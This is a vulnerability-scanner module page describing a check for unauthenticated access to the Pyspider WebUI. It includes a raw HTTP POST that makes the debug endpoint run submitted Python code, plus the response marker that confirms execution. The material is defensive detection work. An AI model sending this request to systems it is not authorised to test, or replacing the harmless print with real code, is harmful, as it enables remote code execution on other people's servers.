Vidoc logo

Module library

All modulesVisit vidocsecurity.com
Ethical Hacking Automation

Automate Recon and scanning process with Vidoc. All security teams in one place

Start for free

Pyspider Unauthorized Access

By kannthu

High
Vidoc logoVidoc Module
#pyspider#unauth
Description

What is "Pyspider Unauthorized Access?"

The "Pyspider Unauthorized Access" module is designed to detect unauthorized access vulnerabilities in the Pyspider web application framework. Pyspider is a powerful Python-based web crawling and scraping framework that allows users to easily develop web spiders to extract data from websites. This module focuses on identifying potential security weaknesses in the Pyspider application that could lead to unauthorized access.

This module has a severity level of high, indicating that if left unaddressed, the vulnerability it detects could have significant consequences for the security of the Pyspider application.

Author: ritikchaddha

Impact

If the "Pyspider Unauthorized Access" vulnerability is successfully exploited, an attacker could gain unauthorized access to sensitive information or perform malicious actions within the Pyspider application. This could lead to data breaches, unauthorized data modifications, or even complete system compromise.

How the module works?

The "Pyspider Unauthorized Access" module works by sending a specific HTTP request to the target Pyspider application and then analyzing the response to determine if the unauthorized access vulnerability is present.

One example of an HTTP request used by this module is:

POST /debug/pyspidervulntest/run HTTP/1.1
Host: {%Hostname%}
Content-Type: application/x-www-form-urlencoded

webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print(str(452345672+%2B+567890765))&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D

This module includes the following matching conditions:

- The response body must contain the word "1020236437". - The response status code must be 200.

If both of these conditions are met, the module will identify the presence of the "Pyspider Unauthorized Access" vulnerability.

Reference - https://github.com/ianxtianxt/Pyspider-webui-poc Metadata - max-request: 1

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
word: 1020236437and
status: 200
Passive global matcher
No matching conditions.
On match action
Report vulnerability